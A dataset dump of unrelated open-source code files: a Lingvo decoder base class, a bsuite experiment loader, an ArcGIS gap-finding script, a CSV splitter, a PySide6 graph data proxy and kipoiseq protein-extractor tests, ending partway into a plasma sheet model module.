+{"seq_id":"192960467","text":"# Lint as: python3\n# Copyright 2018 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Common decoder interface.\"\"\"\n\nimport collections\n\nimport lingvo.compat as tf\nfrom lingvo.core import base_layer\nfrom lingvo.core import beam_search_helper\nfrom lingvo.core import py_utils\nfrom lingvo.core import target_sequence_sampler\n\n# metrics: Dict[Text, Tuple[float, float]] A dict of named metrics, which must\n#   include 'loss'. 
The value of the dict is (metric_val, count), where\n# metric_val is the sum of the metric over all examples, and count is the\n# number of examples seen. The mean value of the metric is metric_val/count.\n# This is the first output of ComputeLoss.\n# predictions: Union[Tensor, Dict[Text, Tensor], NestedMap] This is the output\n# of ComputePredictions.\n# per_sequence: Dict[Text, Tensor] This is the second output of ComputeLoss.\nDecoderOutput = collections.namedtuple(\n 'DecoderOutput',\n ['metrics', 'predictions', 'per_sequence'],\n)\n\n\nclass BaseDecoder(base_layer.BaseLayer):\n \"\"\"Base class for all decoders.\"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define(\n 'packed_input', False, 'If True, decoder and all layers support '\n 'multiple examples in a single sequence.')\n return p\n\n @classmethod\n def UpdateTargetVocabSize(cls, p, vocab_size, wpm_model=None):\n \"\"\"Sets the vocab size and wpm model in the params.\n\n Args:\n p: model params.\n vocab_size: size of the vocabulary.\n wpm_model: file name prefix pointing to a wordpiece model.\n\n Returns:\n Model target vocabulary params updated with the vocab size and wpm model.\n \"\"\"\n raise NotImplementedError('Abstract method')\n\n def FProp(self, theta, encoder_outputs, targets):\n \"\"\"Decodes `targets` given encoded source.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n encoder_outputs: a NestedMap computed by encoder.\n targets: A NestedMap containing additional inputs to the decoder,\n such as the targets being predicted.\n\n Returns:\n A DecoderOutput namedtuple.\n \"\"\"\n predictions = self.ComputePredictions(theta, encoder_outputs, targets)\n metrics, per_sequence = self.ComputeLoss(theta, predictions, targets)\n return DecoderOutput(\n metrics=metrics, predictions=predictions, per_sequence=per_sequence)\n\n def ComputePredictions(self, theta, encoder_outputs, targets):\n raise NotImplementedError('Abstract method: %s' % type(self))\n\n def ComputeLoss(self, theta, predictions, targets):\n raise NotImplementedError('Abstract method: %s' % type(self))\n\n\nclass BaseBeamSearchDecoder(BaseDecoder):\n \"\"\"Decoder that does beam search.\"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define('target_sos_id', 1, 'Id of the target sequence sos symbol.')\n p.Define('target_eos_id', 2, 'Id of the target sequence eos symbol.')\n # TODO(rpang): remove target_seq_len and use beam_search.target_seq_len\n # instead.\n p.Define('target_seq_len', 0, 'Target seq length.')\n p.Define('beam_search', beam_search_helper.BeamSearchHelper.Params(),\n 'BeamSearchHelper params.')\n p.Define('greedy_search', beam_search_helper.GreedySearchHelper.Params(),\n 'GreedySearchHelper params.')\n p.Define('target_sequence_sampler',\n target_sequence_sampler.TargetSequenceSampler.Params(),\n 'TargetSequenceSampler params.')\n p.Define(\n 'bias_only_if_consistent', True, 'BeamSearchBiased bias is only'\n 'applied if the hypothesis has been consistent with targets so far.')\n return p\n\n @classmethod\n def UpdateTargetVocabSize(cls, p, vocab_size, wpm_model=None):\n \"\"\"Sets the vocab size and wpm model in the params.\n\n Args:\n p: model params.\n vocab_size: size of the vocabulary.\n wpm_model: file name prefix pointing to a wordpiece model.\n\n Returns:\n Model target vocabulary params updated with the vocab size and wpm model.\n \"\"\"\n raise NotImplementedError('Abstract method')\n\n def __init__(self, params):\n 
super().__init__(params)\n    p = self.params\n    p.beam_search.target_seq_len = p.target_seq_len\n    p.beam_search.target_sos_id = p.target_sos_id\n    p.beam_search.target_eos_id = p.target_eos_id\n    self.CreateChild('beam_search', p.beam_search)\n    p.greedy_search.target_seq_len = p.target_seq_len\n    p.greedy_search.target_sos_id = p.target_sos_id\n    p.greedy_search.target_eos_id = p.target_eos_id\n    self.CreateChild('greedy_search', p.greedy_search)\n    p.target_sequence_sampler.target_seq_len = p.target_seq_len\n    p.target_sequence_sampler.target_sos_id = p.target_sos_id\n    p.target_sequence_sampler.target_eos_id = p.target_eos_id\n    self.CreateChild('target_sequence_sampler', p.target_sequence_sampler)\n\n  def AddExtraDecodingInfo(self, encoder_outputs, targets):\n    \"\"\"Adds extra decoding information to encoder_outputs.\n\n    Args:\n      encoder_outputs: a NestedMap computed by encoder.\n      targets: a NestedMap containing target input fields.\n\n    Returns:\n      encoder_outputs with extra information used for decoding.\n    \"\"\"\n    return encoder_outputs\n\n  def BeamSearchDecode(self, encoder_outputs, num_hyps_per_beam_override=0):\n    \"\"\"Performs beam search based decoding.\n\n    Args:\n      encoder_outputs: the outputs of the encoder.\n      num_hyps_per_beam_override: If set to a value <= 0, this parameter is\n        ignored. If set to a value > 0, then this value will be used to override\n        p.num_hyps_per_beam.\n\n    Returns:\n      `.BeamSearchDecodeOutput`, A namedtuple whose elements are tensors.\n    \"\"\"\n    return self.BeamSearchDecodeWithTheta(self.theta, encoder_outputs,\n                                          num_hyps_per_beam_override)\n\n  def BeamSearchDecodeWithTheta(self,\n                                theta,\n                                encoder_outputs,\n                                num_hyps_per_beam_override=0):\n    return self.beam_search.BeamSearchDecode(theta, encoder_outputs,\n                                             num_hyps_per_beam_override,\n                                             self._InitBeamSearchStateCallback,\n                                             self._PreBeamSearchStepCallback,\n                                             self._PostBeamSearchStepCallback)\n\n  def GreedySearchDecode(self, encoder_outputs):\n    \"\"\"Performs greedy search based decoding.\n\n    Args:\n      encoder_outputs: the outputs of the encoder.\n\n    Returns:\n      greedy search decode output.\n    \"\"\"\n    return self.GreedySearchDecodeWithTheta(self.theta, encoder_outputs)\n\n  def GreedySearchDecodeWithTheta(self, theta, encoder_outputs):\n    return self.greedy_search.GreedySearchDecode(\n        theta, encoder_outputs,\n        self._InitBeamSearchStateCallback,\n        self._PreBeamSearchStepCallback,\n        self._PostBeamSearchStepCallback)\n\n  def SampleTargetSequences(self, theta, encoder_outputs, random_seed):\n    \"\"\"Performs target sequence sampling.\n\n    Args:\n      theta: A NestedMap object containing weights' values of this layer and its\n        children layers.\n      encoder_outputs: a NestedMap computed by encoder.\n      random_seed: a scalar int32 tensor representing the random seed.\n\n    Returns:\n      A NestedMap containing the following tensors\n\n      - 'ids': [batch, max_target_length] of int32, representing the target\n        sequence ids, not including target_sos_id, but maybe ending with\n        target_eos_id if target_eos_id is sampled.\n      - 'paddings': [batch, max_target_length] of 0/1, where 1 represents\n        a padded timestep.\n    \"\"\"\n    return self.target_sequence_sampler.Sample(\n        theta, encoder_outputs, random_seed, self._InitBeamSearchStateCallback,\n        self._PreBeamSearchStepCallback, self._PostBeamSearchStepCallback)\n\n  def BeamSearchDecodeBiased(self,\n                             encoder_outputs,\n                             num_hyps_per_beam_override=0):\n    \"\"\"Performs beam-search decoding while biasing towards provided targets.\n\n    Args:\n      encoder_outputs: a NestedMap computed by encoder. 
Must include `targets`,\n        which is used to bias beam search.\n      num_hyps_per_beam_override: If set to a value <= 0, this parameter is\n        ignored. If set to a value > 0, then this value will be used to override\n        `p.num_hyps_per_beam`.\n\n    Returns:\n      BeamSearchDecodeOutput, a namedtuple containing the decode results.\n    \"\"\"\n    p = self.params\n\n    targets = encoder_outputs.targets\n    targets.weights *= (1.0 - targets.paddings)\n\n    def PadToTargetSeqLen(tensor, constant):\n      length = tf.shape(tensor)[1]\n      pad = tf.maximum(0, p.beam_search.target_seq_len - length)\n      return tf.pad(tensor, [[0, 0], [0, pad]], constant_values=constant)\n\n    targets.labels = PadToTargetSeqLen(targets.labels, 0)\n    targets.weights = PadToTargetSeqLen(targets.weights, 0)\n\n    def InitBeamSearchStateCallback(theta, encoder_outputs, num_hyps_per_beam):\n      \"\"\"Wrapper for adding bias to _InitBeamSearchStateCallback.\n\n      Expands state to track consistency of hypothesis with provided target.\n\n      Args:\n        theta: A NestedMap object containing weights' values of this layer and\n          its children layers.\n        encoder_outputs: A NestedMap computed by encoder.\n        num_hyps_per_beam: An int, number of hyps to keep for source sentence.\n\n      Returns:\n        initial_results: a `.NestedMap` of initial results.\n        states: a `.NestedMap` of initial model states that the client\n          would like to keep track of for each hyp. The states relevant here\n          are:\n          time_step: A scalar indicating current step (=0 for initial state) of\n            decoder. Must be provided and maintained by super.\n          consistent: A boolean tensor of shape [tgt_batch, 1] which tracks\n            whether each hypothesis has exactly matched\n            encoder_outputs.targets\n            so far.\n      \"\"\"\n      initial_results, states = self._InitBeamSearchStateCallback(\n          theta, encoder_outputs, num_hyps_per_beam)\n      assert hasattr(states, 'time_step')\n      if tf.is_tensor(encoder_outputs.padding):\n        batch_size = tf.shape(encoder_outputs.padding)[1]\n      else:  # Required for multisource models.\n        batch_size = tf.shape(list(encoder_outputs.padding.values())[0])[1]\n      num_hyps = batch_size * num_hyps_per_beam\n      # states.consistent is initially all True\n      states.consistent = tf.ones([\n          num_hyps,\n      ], dtype=tf.bool)\n      return initial_results, states\n\n    def PreBeamSearchStepCallback(theta, encoder_outputs, step_ids, states,\n                                  num_hyps_per_beam, *args, **kwargs):\n      \"\"\"Wrapper for adding bias to _PreBeamSearchStepCallback.\n\n      Biases results.log_probs towards provided encoder_outputs.targets.\n\n      Args:\n        theta: a NestedMap of parameters.\n        encoder_outputs: a NestedMap computed by encoder.\n        step_ids: A tensor of shape [tgt_batch, 1].\n        states: A `.NestedMap` of tensors representing states that the clients\n          would like to keep track of for each of the active hyps.\n        num_hyps_per_beam: Beam size.\n        *args: additional arguments to _PreBeamSearchStepCallback.\n        **kwargs: additional arguments to _PreBeamSearchStepCallback.\n\n      Returns:\n        A tuple (results, out_states).\n        results: A `.NestedMap` of beam search results.\n          atten_probs:\n            The updated attention probs, of shape [tgt_batch, src_len].\n          log_probs:\n            Log prob for each of the tokens in the target vocab. This is of\n            shape\n            [tgt_batch, vocab_size].\n        out_states: a `.NestedMap` The updated states. The states relevant here\n          are:\n          time_step: A scalar indicating current step of decoder. 
Must be\n            provided and maintained by subclass.\n          consistent: A boolean vector of shape [tgt_batch, ] which tracks\n            whether each hypothesis has exactly matched\n            encoder_outputs.targets\n            so far.\n      \"\"\"\n      p = self.params\n      time_step = states.time_step\n      bs_results, out_states = self._PreBeamSearchStepCallback(\n          theta, encoder_outputs, step_ids, states, num_hyps_per_beam, *args,\n          **kwargs)\n      labels = encoder_outputs.targets.labels\n      weights = encoder_outputs.targets.weights\n\n      def ApplyBias():\n        \"\"\"Bias and update log_probs and consistent.\"\"\"\n\n        def TileForBeamAndFlatten(tensor):\n          tensor = tf.reshape(tensor, [1, -1])  # [1, src_batch]\n          tensor = tf.tile(\n              tensor, [num_hyps_per_beam, 1])  # [num_hyps_per_beam, src_batch]\n          tgt_batch = tf.shape(step_ids)[0]  # num_hyps_per_beam*src_batch\n          return tf.reshape(tensor, [tgt_batch])\n\n        # Consistent if step_ids == labels from previous step\n        # TODO(navari): Consider updating consistent only if weights > 0. Then\n        # re-evaluate the need for bias_only_if_consistent=True.\n        # Note that prev_label is incorrect for step 0 but is overridden later\n        prev_label = TileForBeamAndFlatten(\n            tf.gather(labels, tf.maximum(time_step - 1, 0), axis=1))\n        is_step0 = tf.equal(time_step, 0)\n        local_consistence = tf.math.logical_or(\n            is_step0, tf.equal(prev_label, tf.squeeze(step_ids, 1)))\n        consistent = tf.math.logical_and(states.consistent, local_consistence)\n\n        # get label, weight slices corresponding to current time_step\n        label = TileForBeamAndFlatten(tf.gather(labels, time_step, axis=1))\n        weight = TileForBeamAndFlatten(tf.gather(weights, time_step, axis=1))\n        if p.bias_only_if_consistent:\n          weight = weight * tf.cast(consistent, py_utils.FPropDtype(p))\n\n        # convert from dense label to sparse label probs\n        vocab_size = tf.shape(bs_results.log_probs)[1]\n        uncertainty = tf.constant(1e-10, py_utils.FPropDtype(\n            p))  # avoid 0 probs which may cause issues with log\n        label_probs = tf.one_hot(\n            label,\n            vocab_size,\n            on_value=1 - uncertainty,\n            off_value=uncertainty /\n            tf.cast(vocab_size - 1, py_utils.FPropDtype(p)),\n            dtype=py_utils.FPropDtype(p))  # [tgt_batch, vocab_size]\n        pred_probs = tf.exp(bs_results.log_probs)\n\n        # interpolate predicted probs and label probs\n        weight = tf.expand_dims(weight, 1)\n        probs = py_utils.with_dependencies([\n            py_utils.assert_less_equal(weight, 1.),\n            py_utils.assert_greater_equal(weight, 0.)\n        ], (1.0 - weight) * pred_probs + weight * label_probs)\n        return tf.math.log(probs), consistent\n\n      def NoApplyBias():\n        \"\"\"No-op. Return original log_probs and consistent.\"\"\"\n        return bs_results.log_probs, states.consistent\n\n      log_probs, consistent = tf.cond(\n          tf.reduce_all(tf.equal(weights, 0.0)), NoApplyBias, ApplyBias)\n      bs_results.log_probs = log_probs\n      out_states.consistent = consistent\n\n      return bs_results, out_states\n\n    return self.beam_search.BeamSearchDecode(self.theta, encoder_outputs,\n                                             num_hyps_per_beam_override,\n                                             InitBeamSearchStateCallback,\n                                             PreBeamSearchStepCallback,\n                                             self._PostBeamSearchStepCallback)\n\n  def InferenceAdditionalEncoder(self, feeds):\n    \"\"\"Generate an inference graph for the additional encoder.\"\"\"\n    return py_utils.NestedMap(), py_utils.NestedMap()\n","sub_path":"lingvo/core/base_decoder.py","file_name":"base_decoder.py","file_ext":"py","file_size_in_byte":16355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"175207271","text":"# pylint: disable=g-bad-file-header\n# Copyright 2019 DeepMind Technologies Limited. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"Simple diagnostic memory challenge.\n\nObservation is given by n+1 pixels: (context, time_to_live).\n\nContext will only be nonzero in the first step, when it will be +1 or -1 iid\nby component. All actions take no effect until time_to_live=0, then the agent\nmust repeat the observations that it saw bit-by-bit.\n\"\"\"\n\nfrom typing import Optional\n\nfrom bsuite.environments import memory_chain\nfrom bsuite.experiments.memory_size import sweep\n\n\ndef load(num_bits: int, seed: Optional[int] = 0):\n \"\"\"Memory Chain environment, with variable number of bits.\"\"\"\n env = memory_chain.MemoryChain(\n memory_length=2,\n num_bits=num_bits,\n seed=seed,\n )\n env.bsuite_num_episodes = sweep.NUM_EPISODES\n return env\n\n","sub_path":"bsuite/experiments/memory_size/memory_size.py","file_name":"memory_size.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"224979973","text":"import arcpy\n\nfc = arcpy.GetParameterAsText(0)\ntopo = arcpy.GetParameterAsText(1)\nsearch_radius = arcpy.GetParameterAsText(2)\n\narcpy.env.workspace = \"IN_MEMORY\"\n\narcpy.env.overwriteOutput = True\n\npoints = arcpy.ExportTopologyErrors_management(topo,\"\", \"topo\")[0]\n\nlyr = arcpy.MakeFeatureLayer_management(points,\"lyr\")\n\nexpression = \"{0} = 'Must Not Have Dangles'\".format(arcpy.AddFieldDelimiters(lyr, \"RuleDescription\"))\n\narcpy.SelectLayerByAttribute_management(lyr,\"NEW_SELECTION\",expression)\n\narcpy.Near_analysis(lyr,lyr,search_radius)\n\nexpression2 = \"{0} > 0\".format(arcpy.AddFieldDelimiters(lyr, \"NEAR_DIST\"))\n\narcpy.SelectLayerByAttribute_management(lyr,\"NEW_SELECTION\",expression2)\n\narcpy.CopyFeatures_management(lyr,fc)","sub_path":"ArcGIS/find_gaps.py","file_name":"find_gaps.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"539353994","text":"from os import listdir\nfrom os.path import isfile, join, splitext\nfrom random import shuffle \nimport csv\n\n\nmain_path = '/home/gpds/Documents/AutoEncoderVideo/src'\nwith open('UnB-AVQ-2018-Experiment1.csv','r') as f:\n\treader= csv.reader(f)\n\tlist = list(reader)\n\tlist = list[1:]\n\tamnt_rows = len(list)\n\tamnt_training = int(amnt_rows * 0.8)\n\tamnt_testing = amnt_rows - amnt_training\n\tshuffle(list)\n\nwith open('Experiment1_train.csv','w', newline='') as train_file:\n\tfields_names =['refFile', 'testFile', 'Mqs', 'Mcs', 'HRC', 'videoDegradationType', 'videoCodec', 'videoBitrate', 'packetLossRate','freezingPauses', 'freezingLength'];\n\ttrain_w = csv.writer(train_file, delimiter=';')\n\ttrain_w.writerow(fields_names)\n\tfor i in range(amnt_training):\n\t\ttrain_w.writerow(list[i])\n\nwith open('Experiment1_test.csv','w', newline='') as test_file:\n\tfields_names =['refFile', 
'testFile', 'Mqs', 'Mcs', 'HRC', 'videoDegradationType', 'videoCodec', 'videoBitrate', 'packetLossRate','freezingPauses', 'freezingLength'];\n\ttest_w = csv.writer(test_file, delimiter=';')\n\ttest_w.writerow(fields_names)\n\tfor i in range(amnt_training, amnt_rows):\n\t\ttest_w.writerow(list[i])\n","sub_path":"src/csvsplit.py","file_name":"csvsplit.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"393445346","text":"# Copyright (C) 2023 The Qt Company Ltd.\n# SPDX-License-Identifier: LicenseRef-Qt-Commercial OR BSD-3-Clause\n\nfrom PySide6.QtCore import Slot\nfrom PySide6.QtGraphs import QBarDataProxy, QBarDataItem\n\n\nclass VariantBarDataProxy(QBarDataProxy):\n\n def __init__(self):\n super().__init__()\n self._dataSet = None\n self._mapping = None\n\n def setDataSet(self, newSet):\n if self._dataSet:\n self._dataSet.itemsAdded.disconnect(self.handleItemsAdded)\n self._dataSet.dataCleared.disconnect(self.handleDataCleared)\n\n self._dataSet = newSet\n\n if self._dataSet:\n self._dataSet.itemsAdded.connect(self.handleItemsAdded)\n self._dataSet.dataCleared.connect(self.handleDataCleared)\n self.resolveDataSet()\n\n def dataSet(self):\n return self._dataSet.data()\n\n # Map key (row, column, value) to value index in data item (VariantItem).\n # Doesn't gain ownership of mapping, but does connect to it to listen for\n # mapping changes. Modifying mapping that is set to proxy will trigger\n # dataset re-resolving.\n def setMapping(self, mapping):\n if self._mapping:\n self._mapping.mappingChanged.disconnect(self.handleMappingChanged)\n\n self._mapping = mapping\n\n if self._mapping:\n self._mapping.mappingChanged.connect(self.handleMappingChanged)\n\n self.resolveDataSet()\n\n def mapping(self):\n return self._mapping.data()\n\n @Slot(int, int)\n def handleItemsAdded(self, index, count):\n # Resolve new items\n self.resolveDataSet()\n\n @Slot()\n def handleDataCleared(self):\n # Data cleared, reset array\n self.resetArray(None)\n\n @Slot()\n def handleMappingChanged(self):\n self.resolveDataSet()\n\n # Resolve entire dataset into QBarDataArray.\n def resolveDataSet(self):\n # If we have no data or mapping, or the categories are not defined,\n # simply clear the array\n if (not self._dataSet or not self._mapping\n or not self._mapping.rowCategories()\n or not self._mapping.columnCategories()):\n self.resetArray()\n return\n\n itemList = self._dataSet.itemList()\n\n rowIndex = self._mapping.rowIndex()\n columnIndex = self._mapping.columnIndex()\n valueIndex = self._mapping.valueIndex()\n rowList = self._mapping.rowCategories()\n columnList = self._mapping.columnCategories()\n\n # Sort values into rows and columns\n itemValueMap = {}\n for item in itemList:\n key = str(item[rowIndex])\n v = itemValueMap.get(key)\n if not v:\n v = {}\n itemValueMap[key] = v\n v[str(item[columnIndex])] = float(item[valueIndex])\n\n # Create a new data array in format the parent class understands\n newProxyArray = []\n for rowKey in rowList:\n newProxyRow = []\n for i in range(0, len(columnList)):\n item = QBarDataItem(itemValueMap[rowKey][columnList[i]])\n newProxyRow.append(item)\n newProxyArray.append(newProxyRow)\n\n # Finally, reset the data array in the parent class\n 
self.resetArray(newProxyArray)\n","sub_path":"examples/graphs/widgetgallery/variantbardataproxy.py","file_name":"variantbardataproxy.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"74543866","text":"import pytest\nfrom pytest_mock import mocker\nimport pandas as pd\nfrom kipoiseq.transforms.functional import translate, rc_dna\nfrom kipoiseq.dataclasses import Interval, Variant\nfrom kipoiseq.extractors.protein import cut_transcript_seq, gtf_row2interval, \\\n CDSFetcher, TranscriptSeqExtractor, ProteinSeqExtractor, \\\n ProteinVCFSeqExtractor, SingleSeqProteinVCFSeqExtractor, \\\n SingleVariantProteinVCFSeqExtractor\n\ngtf_file = 'tests/data/sample_1_protein.gtf'\nfasta_file = 'tests/data/demo_dna_seq.fa'\ntranscript_id = 'enst_test1'\nvcf_file = 'tests/data/singleVar_vcf_enst_test2.vcf.gz'\n\n\nintervals = [\n Interval('22', 580, 596, strand='+', attrs={'tag': 'cds_end_NF'}),\n Interval('22', 597, 610, strand='+', attrs={'tag': 'cds_end_NF'})\n]\n\n\ndef test_cut_seq():\n seq = 'ATCGATG'\n seq = cut_transcript_seq(seq, 'cds_end_NF')\n assert len(seq) == 6\n\n seq = 'ATCGATG'\n seq = cut_transcript_seq(seq, 'cds_end_NF,cds_start_NF')\n assert len(seq) == 3\n\n seq = 'ATCGATG'\n seq = cut_transcript_seq(seq, 'cds_start_NF')\n assert len(seq) == 9\n\n seq = 'ATCGATG'\n seq = cut_transcript_seq(seq, 'no_tag')\n assert len(seq) == 3\n\n\ndef test_gtf_row2interval():\n row = pd.Series({\n 'Chromosome': '22',\n 'Start': 10,\n 'End': 20,\n 'Strand': '-',\n 'tag': 'cds_end_NF'\n })\n expected_interval = Interval(chrom='22', start=10,\n end=20, name='', strand='-', attrs={'tag': 'cds_end_NF'})\n\n assert gtf_row2interval(row) == expected_interval\n\n\ndef test_CDSFetcher__read_cds():\n cds = CDSFetcher._read_cds(gtf_file, duplicate_attr=True)\n assert cds.shape[0] == 7\n\n assert cds.iloc[0].Chromosome == '22'\n assert cds.iloc[0].Start == 598\n assert cds.iloc[0].End == 3050\n\n assert cds.iloc[3].Start == 3\n assert cds.iloc[3].End == 300\n\n\n@pytest.fixture\ndef cds_fetcher():\n return CDSFetcher(gtf_file)\n\n\ndef test_CDSFetcher__len__(cds_fetcher):\n assert len(cds_fetcher) == 3\n\n\ndef test_CDSFetcher_get_cds(cds_fetcher):\n intervals = cds_fetcher.get_cds(transcript_id)\n intervals[0] == Interval(chrom='22', start=598,\n end=3196, name='', strand='+')\n # TODO: Improve testcase with adding transcript with 2 cds\n\n\n@pytest.fixture\ndef transcript_seq_extractor():\n return TranscriptSeqExtractor(gtf_file, fasta_file)\n\n\ndef test_get_protein_seq(transcript_seq_extractor):\n transcript_id = 'enst_test2'\n seq = transcript_seq_extractor.get_protein_seq(transcript_id)\n txt_file = 'tests/data/Output_singleSeq_vcf_enst_test2.txt'\n expected_seq = open(txt_file).readline()\n assert seq[1:] == expected_seq[1:] # no expected mutation here\n\n\ndef test_TranscriptSeqExtractor_prepare_seq():\n seqs = ['ATCGATG']\n assert 'ATCGAT' == TranscriptSeqExtractor._prepare_seq(\n seqs, '+', 'cds_end_NF')\n assert 'CATCGA' == TranscriptSeqExtractor._prepare_seq(\n seqs, '-', 'cds_end_NF')\n\n\ndef test_TranscriptSeqExtractor_get_seq(transcript_seq_extractor):\n seq = transcript_seq_extractor.get_seq(transcript_id)\n assert len(seq) == 3196 - 598\n\n\ndef test_TranscriptSeqExtractor_get_item(transcript_seq_extractor):\n assert transcript_seq_extractor[0] == transcript_seq_extractor.get_seq(\n transcript_id)\n\n\n@pytest.fixture\ndef protein_seq_extractor():\n return ProteinSeqExtractor(gtf_file, 
fasta_file)\n\n\ndef test_ProteinSeqExtractor_prepare_seq(protein_seq_extractor):\n seqs = ['ATCGATG']\n\n pro_seq = protein_seq_extractor._prepare_seq(seqs, '+', 'cds_end_NF')\n assert pro_seq == 'ID'\n\n pro_seq = protein_seq_extractor._prepare_seq(seqs, '-', 'cds_end_NF')\n assert pro_seq == 'HR'\n\n\ndef test_ProteinVCFSeqExtractor__unstrand():\n unstrand_intervals = ProteinVCFSeqExtractor._unstrand(intervals)\n assert all(i.strand == '.' for i in unstrand_intervals)\n\n# TODO: write test for with sample_id\n\n\n@pytest.fixture\ndef protein_vcf_seq(mocker):\n extractor = ProteinVCFSeqExtractor(gtf_file, fasta_file, vcf_file)\n extractor.extract_query = mocker.MagicMock(\n return_value=iter((['ATC', 'GATG'], ['CATC', 'GAT'])))\n return extractor\n\n\ndef test_ProteinVCFSeqExtractor_extract_cds(protein_vcf_seq):\n protein_seqs = list(protein_vcf_seq.extract_cds(intervals))\n\n assert protein_seqs[0] == 'ID'\n assert protein_seqs[1] == 'HR'\n\n query = list(protein_vcf_seq.extract_query\n .call_args[0][0].variant_intervals)\n\n variants = list(query[0][0])\n assert len(variants) == 1\n assert variants[0].pos == 596\n interval = query[0][1]\n assert interval.start == 580\n\n variants = list(query[1][0])\n\n assert len(variants) == 1\n assert variants[0].pos == 598\n interval = query[1][1]\n assert interval.start == 597\n\n\ndef test_ProteinVCFSeqExtractor_extract(protein_vcf_seq):\n transcript_id = 'enst_test2'\n protein_seqs = list(protein_vcf_seq.extract(transcript_id))\n assert protein_seqs[0] == 'HR'\n assert protein_seqs[1] == 'ID'\n\n\n@pytest.fixture\ndef single_seq_protein():\n vcf_file = 'tests/data/singleVar_vcf_enst_test2.vcf.gz'\n return SingleSeqProteinVCFSeqExtractor(gtf_file, fasta_file, vcf_file)\n\n\ndef test_SingleSeqProteinVCFSeqExtractor_extract(single_seq_protein, transcript_seq_extractor):\n transcript_id = 'enst_test2'\n seq = single_seq_protein.extract(transcript_id)\n txt_file = 'tests/data/Output_singleSeq_vcf_enst_test2.txt'\n expected_seq = open(txt_file).readline()\n assert seq == expected_seq\n\n vcf_file = 'tests/data/singleVar_vcf_enst_test1_diff_type_of_variants.vcf.gz'\n transcript_id = 'enst_test1'\n single_seq_protein = SingleSeqProteinVCFSeqExtractor(\n gtf_file, fasta_file, vcf_file)\n\n seq = single_seq_protein.extract(transcript_id)\n ref_seq = transcript_seq_extractor.get_protein_seq(transcript_id)\n\n assert len(seq) == len(ref_seq)\n count = diff_between_two_seq(seq, ref_seq)\n assert count == 1, 'Expected diff of 1 AA, but it was: '+str(count)\n\n vcf_file = 'tests/data/singleSeq_vcf_enst_test2.vcf.gz'\n single_seq_protein = SingleSeqProteinVCFSeqExtractor(\n gtf_file, fasta_file, vcf_file)\n seq = list(single_seq_protein.extract_all())\n assert len(seq) == 0\n \n \n\n\n@pytest.fixture\ndef single_variant_seq():\n vcf_file = 'tests/data/singleVar_vcf_enst_test2.vcf.gz'\n return SingleVariantProteinVCFSeqExtractor(gtf_file, fasta_file, vcf_file)\n\n\ndef diff_between_two_seq(seq1, seq2):\n count = 0\n for i in range(len(seq1)):\n if seq1[i] != seq2[i]:\n count += 1\n return count\n\n\ndef test_SingleVariantProteinVCFSeqExtractor_extract(single_variant_seq, transcript_seq_extractor):\n transcript_id = 'enst_test2'\n seqs = list(single_variant_seq.extract(transcript_id))\n txt_file = 'tests/data/Output_singleVar_vcf_enst_test2.txt'\n expected_seq = open(txt_file).read().splitlines()\n assert seqs[0] == expected_seq[0]\n assert seqs[1] == expected_seq[1]\n assert seqs[2] == expected_seq[2]\n\n seqs = list(single_variant_seq.extract_all())\n counter = 
0\n for tr_id, t_id_seqs in seqs:\n t_id_seqs = list(t_id_seqs)\n counter += len(t_id_seqs)\n for i, seq in enumerate(t_id_seqs):\n assert seq == expected_seq[i]\n assert tr_id == 'enst_test2'\n assert counter == 3, 'Number of variants in vcf 3, but # of seq was: ' + \\\n str(counter)\n \n transcript_id = ['enst_test2', 'enst_test1']\n seqs = single_variant_seq.extract_list(transcript_id)\n for tr_id, t_id_seqs in seqs:\n assert tr_id in ['enst_test2', 'enst_test1'], tr_id\n \n \n vcf_file = 'tests/data/singleVar_vcf_enst_test1_diff_type_of_variants.vcf.gz'\n transcript_id = 'enst_test1'\n single_var_protein = SingleVariantProteinVCFSeqExtractor(\n gtf_file, fasta_file, vcf_file)\n\n seqs = list(single_var_protein.extract(transcript_id))\n ref_seq = transcript_seq_extractor.get_protein_seq(transcript_id)\n\n assert len(seqs) == 1\n for seq in seqs:\n assert len(seq) == len(ref_seq)\n count = diff_between_two_seq(seq, ref_seq)\n assert count == 1, 'Expected diff of 1 AA, but it was: '+str(count)\n\n vcf_file = 'tests/data/singleSeq_vcf_enst_test2.vcf.gz'\n single_var_protein = SingleVariantProteinVCFSeqExtractor(\n gtf_file, fasta_file, vcf_file)\n length = 0\n seqs = list(single_var_protein.extract_all())\n for t_id in seqs:\n length = len(list(t_id))\n assert length == 0\n\n# TODO: add for all proteins.pep.all.fa\n","sub_path":"tests/extractors/test_protein.py","file_name":"test_protein.py","file_ext":"py","file_size_in_byte":8516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"561970812","text":"\"\"\"\nThis file contains an object-oriented implementation of the Tsyganenko-Mukai\nplasma sheet model. This model is based off of a statistical analysis of\nmeasurements from the GEOTAIL spacecraft. 